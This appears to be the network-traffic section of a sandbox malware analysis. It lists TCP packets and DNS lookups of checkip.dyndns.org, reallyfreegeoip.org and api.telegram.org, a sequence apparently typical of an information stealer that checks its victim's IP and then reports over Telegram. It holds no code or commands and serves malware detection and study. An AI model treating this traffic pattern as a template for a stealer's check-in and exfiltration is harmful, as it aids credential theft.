                                            Jul 24, 2024 15:08:23.092784882 CEST8049709158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:23.096669912 CEST44349707188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:23.096892118 CEST44349707188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:23.096946955 CEST49707443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:23.097527027 CEST49707443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:23.103072882 CEST4971080192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:23.109998941 CEST8049710158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:23.110069036 CEST4971080192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:23.110166073 CEST4971080192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:23.115142107 CEST8049710158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:23.676656961 CEST8049709158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:23.687436104 CEST4970980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:23.693418026 CEST8049709158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:23.719739914 CEST8049710158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:23.720948935 CEST49712443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:23.720995903 CEST44349712188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:23.721086979 CEST49712443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:23.721333981 CEST49712443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:23.721348047 CEST44349712188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:23.769025087 CEST4971080192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:23.846412897 CEST8049709158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:23.914058924 CEST49713443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:23.914102077 CEST44349713188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:23.914252996 CEST49713443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:23.918582916 CEST49713443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:23.918598890 CEST44349713188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:23.925283909 CEST4970980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:24.202778101 CEST44349712188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:24.204476118 CEST49712443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:24.204499006 CEST44349712188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:24.329875946 CEST44349712188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:24.329971075 CEST44349712188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:24.332369089 CEST49712443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:24.332885027 CEST49712443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:24.336133003 CEST4971080192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:24.337079048 CEST4971480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:24.341783047 CEST8049710158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:24.341846943 CEST4971080192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:24.342272997 CEST8049714158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:24.342339039 CEST4971480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:24.342401981 CEST4971480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:24.347321033 CEST8049714158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:24.407718897 CEST44349713188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:24.407831907 CEST49713443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:24.409501076 CEST49713443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:24.409529924 CEST44349713188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:24.410509109 CEST44349713188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:24.456542015 CEST49713443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:24.576205015 CEST49713443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:24.620529890 CEST44349713188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.003254890 CEST44349713188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.003381968 CEST44349713188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.003429890 CEST49713443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.006664038 CEST49713443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.009537935 CEST4970980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.021889925 CEST8049709158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:25.104147911 CEST8049714158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:25.105362892 CEST49715443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.105398893 CEST44349715188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.105530977 CEST49715443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.105756044 CEST49715443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.105765104 CEST44349715188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.159748077 CEST4971480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.179019928 CEST8049709158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:25.180777073 CEST49716443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.180892944 CEST44349716188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.180994987 CEST49716443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.181263924 CEST49716443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.181294918 CEST44349716188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.222165108 CEST4970980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.592849970 CEST44349715188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.594640017 CEST49715443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.594656944 CEST44349715188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.675904989 CEST44349716188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.677514076 CEST49716443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.677553892 CEST44349716188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.755223036 CEST44349715188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.755347967 CEST44349715188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.755469084 CEST49715443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.755882025 CEST49715443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.759516001 CEST4971480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.760431051 CEST4971780192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.765552998 CEST8049717158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:25.765628099 CEST4971780192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.765774012 CEST4971780192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.766063929 CEST8049714158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:25.766233921 CEST4971480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.770957947 CEST8049717158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:25.809308052 CEST44349716188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.809523106 CEST44349716188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:25.809740067 CEST49716443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.810060024 CEST49716443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:25.813555002 CEST4970980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.814800978 CEST4971880192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.818999052 CEST8049709158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:25.819171906 CEST4970980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.819803953 CEST8049718158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:25.819899082 CEST4971880192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.820039034 CEST4971880192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:25.827128887 CEST8049718158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:26.338928938 CEST8049717158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:26.340445042 CEST49719443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:26.340568066 CEST44349719188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:26.340652943 CEST49719443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:26.340883017 CEST49719443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:26.340903997 CEST44349719188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:26.378408909 CEST4971780192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:26.405514002 CEST8049718158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:26.406845093 CEST49720443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:26.406949043 CEST44349720188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:26.407061100 CEST49720443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:26.407371044 CEST49720443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:26.407406092 CEST44349720188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:26.456581116 CEST4971880192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:26.865969896 CEST44349719188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:26.867495060 CEST49719443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:26.867522955 CEST44349719188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:27.302017927 CEST44349720188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:27.303878069 CEST49720443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:27.303920984 CEST44349720188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:27.410937071 CEST44349719188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:27.411070108 CEST44349719188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:27.411148071 CEST49719443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:27.411597013 CEST49719443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:27.415052891 CEST4971780192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:27.416167021 CEST4972180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:27.426629066 CEST8049721158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:27.426721096 CEST4972180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:27.426820993 CEST4972180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:27.431598902 CEST8049717158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:27.431660891 CEST4971780192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:27.433618069 CEST8049721158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:27.440862894 CEST44349720188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:27.440964937 CEST44349720188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:27.441147089 CEST49720443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:27.441502094 CEST49720443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:27.445837021 CEST4972280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:27.451667070 CEST8049722158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:27.451749086 CEST4972280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:27.451855898 CEST4972280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:27.457107067 CEST8049722158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:28.017930984 CEST8049721158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:28.020617962 CEST49723443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.020677090 CEST44349723188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.020813942 CEST49723443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.021090031 CEST49723443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.021105051 CEST44349723188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.037288904 CEST8049722158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:28.038629055 CEST49724443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.038657904 CEST44349724188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.038769007 CEST49724443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.039252996 CEST49724443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.039263010 CEST44349724188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.065947056 CEST4972180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.081589937 CEST4972280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.522593975 CEST44349723188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.524837971 CEST49723443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.524924994 CEST44349723188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.568397999 CEST44349724188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.574436903 CEST49724443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.574472904 CEST44349724188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.692552090 CEST44349723188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.692791939 CEST44349723188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.693111897 CEST49723443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.693902969 CEST49723443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.711930990 CEST44349724188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.712219954 CEST44349724188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:28.712460041 CEST49724443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.729391098 CEST4972180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.740883112 CEST8049721158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:28.741677046 CEST4972180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.750392914 CEST4972580192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.755460024 CEST8049725158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:28.758610010 CEST4972580192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.774483919 CEST4972580192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.779738903 CEST8049725158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:28.793200970 CEST49724443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:28.820739985 CEST4972680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.821741104 CEST4972280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.825925112 CEST8049726158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:28.826019049 CEST4972680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.826220989 CEST4972680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.827727079 CEST8049722158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:28.827788115 CEST4972280192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:28.841023922 CEST8049726158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:30.032037020 CEST8049725158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:30.033286095 CEST49727443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.033322096 CEST44349727188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.033387899 CEST49727443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.033713102 CEST49727443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.033725023 CEST44349727188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.081557989 CEST4972580192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:30.127151012 CEST8049726158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:30.128828049 CEST49728443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.128869057 CEST44349728188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.128932953 CEST49728443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.129194021 CEST49728443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.129210949 CEST44349728188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.175314903 CEST4972680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:30.565747023 CEST44349727188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.568068981 CEST49727443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.568092108 CEST44349727188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.641524076 CEST44349728188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.644226074 CEST49728443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.644257069 CEST44349728188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.700969934 CEST44349727188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.701225996 CEST44349727188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.701467037 CEST49727443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.701950073 CEST49727443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.787667036 CEST44349728188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.787817955 CEST44349728188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:30.788737059 CEST49728443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.788738012 CEST49728443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:30.791801929 CEST4972680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:30.792789936 CEST4972980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:30.797519922 CEST8049726158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:30.797653913 CEST4972680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:30.798162937 CEST8049729158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:30.800734043 CEST4972980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:30.800734043 CEST4972980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:30.806484938 CEST8049729158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:32.402692080 CEST8049729158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:32.404115915 CEST49730443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:32.404170990 CEST44349730188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:32.404288054 CEST49730443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:32.404520035 CEST49730443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:32.404535055 CEST44349730188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:32.456588984 CEST4972980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:32.889738083 CEST44349730188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:32.891393900 CEST49730443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:32.891429901 CEST44349730188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:33.041904926 CEST44349730188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:33.042135954 CEST44349730188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:33.042236090 CEST49730443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:33.044400930 CEST49730443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:33.045779943 CEST4972980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:33.046978951 CEST4973180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:33.053464890 CEST8049729158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:33.053492069 CEST8049731158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:33.053561926 CEST4973180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:33.053560972 CEST4972980192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:33.053721905 CEST4973180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:33.062200069 CEST8049731158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:35.086693048 CEST8049731158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:35.088406086 CEST49732443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:35.088454962 CEST44349732188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:35.088547945 CEST49732443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:35.088893890 CEST49732443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:35.088907957 CEST44349732188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:35.128474951 CEST4973180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:35.576287031 CEST44349732188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:35.578387022 CEST49732443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:35.578427076 CEST44349732188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:35.742038965 CEST44349732188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:35.742132902 CEST44349732188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:35.742183924 CEST49732443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:35.742670059 CEST49732443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:35.746273994 CEST4973180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:35.746884108 CEST4973480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:35.751800060 CEST8049731158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:35.751877069 CEST4973180192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:35.751993895 CEST8049734158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:35.752049923 CEST4973480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:35.752161980 CEST4973480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:35.758624077 CEST8049734158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:35.959789991 CEST4972580192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:35.965588093 CEST8049725158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:35.965715885 CEST4972580192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:35.970580101 CEST49735443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:35.970634937 CEST44349735149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:35.970776081 CEST49735443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:35.972100973 CEST49735443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:35.972126007 CEST44349735149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:36.624759912 CEST44349735149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:36.624955893 CEST49735443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:36.626970053 CEST49735443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:36.626980066 CEST44349735149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:36.627259016 CEST44349735149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:36.628910065 CEST49735443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:36.672502995 CEST44349735149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:36.672712088 CEST49735443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:36.672729015 CEST44349735149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:36.970977068 CEST44349735149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:36.971194983 CEST44349735149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:36.971328974 CEST49735443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:36.971887112 CEST49735443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:37.506752968 CEST8049734158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:37.514086008 CEST49740443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:37.514144897 CEST44349740188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:37.514399052 CEST49740443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:37.515170097 CEST49740443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:37.515183926 CEST44349740188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:37.550327063 CEST4973480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:37.987356901 CEST44349740188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:37.997589111 CEST49740443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:37.997627020 CEST44349740188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:38.120304108 CEST44349740188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:38.120413065 CEST44349740188.114.97.3192.168.2.7
                                            Jul 24, 2024 15:08:38.123749971 CEST49740443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:38.124896049 CEST49740443192.168.2.7188.114.97.3
                                            Jul 24, 2024 15:08:43.317800999 CEST4973480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:43.318099976 CEST49741443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:43.318151951 CEST44349741149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:43.318218946 CEST49741443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:43.318583965 CEST49741443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:43.318594933 CEST44349741149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:43.324561119 CEST8049734158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:08:43.324620008 CEST4973480192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:08:43.941622019 CEST44349741149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:43.941700935 CEST49741443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:43.944926977 CEST49741443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:43.944936991 CEST44349741149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:43.945152044 CEST44349741149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:43.946635008 CEST49741443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:43.988508940 CEST44349741149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:43.988569975 CEST49741443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:43.988581896 CEST44349741149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:44.499490023 CEST44349741149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:44.524349928 CEST44349741149.154.167.220192.168.2.7
                                            Jul 24, 2024 15:08:44.524424076 CEST49741443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:08:44.524966955 CEST49741443192.168.2.7149.154.167.220
                                            Jul 24, 2024 15:09:27.033144951 CEST8049706158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:09:27.033402920 CEST4970680192.168.2.7158.101.44.242
                                            Jul 24, 2024 15:09:31.406105042 CEST8049718158.101.44.242192.168.2.7
                                            Jul 24, 2024 15:09:31.406229019 CEST4971880192.168.2.7158.101.44.242
                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 24, 2024 15:08:19.028949976 CEST5927653192.168.2.71.1.1.1
                                            Jul 24, 2024 15:08:19.037156105 CEST53592761.1.1.1192.168.2.7
                                            Jul 24, 2024 15:08:19.867918968 CEST6514053192.168.2.71.1.1.1
                                            Jul 24, 2024 15:08:19.877916098 CEST53651401.1.1.1192.168.2.7
                                            Jul 24, 2024 15:08:35.961750031 CEST5185153192.168.2.71.1.1.1
                                            Jul 24, 2024 15:08:35.969769001 CEST53518511.1.1.1192.168.2.7
                                            Jul 24, 2024 15:08:50.730046988 CEST5359187162.159.36.2192.168.2.7
                                            Jul 24, 2024 15:08:51.613219976 CEST6020553192.168.2.71.1.1.1
                                            Jul 24, 2024 15:08:51.861398935 CEST53602051.1.1.1192.168.2.7
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jul 24, 2024 15:08:19.028949976 CEST192.168.2.71.1.1.10x4989Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:19.867918968 CEST192.168.2.71.1.1.10x77d3Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                            Jul 24, 2024 15:08:35.961750031 CEST192.168.2.71.1.1.10x7a6dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
